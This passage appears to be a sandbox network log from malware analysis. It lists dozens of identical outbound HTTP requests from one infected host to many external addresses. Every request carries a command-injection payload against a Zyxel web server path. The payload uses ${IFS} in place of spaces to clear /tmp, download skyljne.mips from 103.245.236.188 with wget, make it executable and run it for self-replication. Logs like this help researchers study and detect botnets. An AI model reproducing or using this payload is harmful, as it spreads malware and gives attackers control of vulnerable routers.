                                                Jan 12, 2024 18:16:20.391239882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3812192.168.2.236057424.132.73.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391283989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3813192.168.2.2353276112.39.70.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391323090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3814192.168.2.235891481.240.242.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391377926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3815192.168.2.2343326190.182.218.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391416073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3816192.168.2.2339810166.236.245.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391457081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3817192.168.2.234606420.198.212.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391513109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3818192.168.2.234328865.198.9.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391551018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3819192.168.2.235210068.86.18.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391622066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3820192.168.2.2336832180.92.79.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391644955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3821192.168.2.2351354212.137.95.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391681910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3822192.168.2.2333544155.77.31.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391710997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3823192.168.2.2360702148.148.254.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391752958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3824192.168.2.234372441.71.26.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391786098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3825192.168.2.2343676208.215.226.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391827106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3826192.168.2.2350768199.126.36.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391856909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3827192.168.2.235444614.20.6.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391897917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3828192.168.2.2347022107.39.29.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391927958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3829192.168.2.234893880.83.139.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391976118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3830192.168.2.235111065.49.249.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392015934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3831192.168.2.2338754133.254.166.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392064095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3832192.168.2.2341124178.244.237.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392117977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3833192.168.2.23540522.246.147.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392151117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3834192.168.2.2356480184.93.174.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392182112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3835192.168.2.2336146113.63.74.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392225981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3836192.168.2.2357228201.176.91.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392255068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3837192.168.2.235705081.88.28.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392313957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3838192.168.2.2352228132.20.70.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392364025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3839192.168.2.2345590222.121.240.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392383099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3840192.168.2.233476085.102.197.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392425060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3841192.168.2.2348166109.38.153.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392462015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3842192.168.2.234579846.147.59.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392505884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3843192.168.2.2360104191.193.90.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392535925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3844192.168.2.2340700136.59.95.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392585993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3845192.168.2.2350450136.127.144.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392610073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3846192.168.2.23438702.154.227.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392630100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3847192.168.2.234615220.215.188.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392689943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3848192.168.2.235620427.92.208.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392719984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3849192.168.2.2358556119.34.103.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392771959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3850192.168.2.236014689.37.79.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392812967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3851192.168.2.235910067.183.246.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392843008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3852192.168.2.2336998117.106.231.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392862082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3853192.168.2.235496479.120.175.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392926931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3854192.168.2.233783436.49.39.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392952919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3855192.168.2.234152084.53.170.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.392992973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3856192.168.2.2359632131.72.16.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393013954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3857192.168.2.2338282192.31.104.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393059969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3858192.168.2.2358614211.224.147.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393115997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3859192.168.2.233485035.27.224.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393155098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3860192.168.2.235609457.3.192.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393173933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3861192.168.2.234069083.19.68.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393213034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3862192.168.2.2358154138.27.224.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393254042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3863192.168.2.2348554118.211.68.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393301010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3864192.168.2.2355552179.9.145.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393330097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3865192.168.2.2336430222.6.138.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393389940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3866192.168.2.234323877.83.2.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393412113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3867192.168.2.2353132159.133.248.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393439054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3868192.168.2.236070423.228.214.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393477917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3869192.168.2.235654461.65.252.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393565893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3870192.168.2.2339896154.131.136.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393589020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3871192.168.2.2352622165.226.19.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393594980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3872192.168.2.2341002123.107.111.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393632889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3873192.168.2.235036896.166.246.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393657923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3874192.168.2.233360891.207.171.174443
                                                TimestampBytes transferredDirectionData
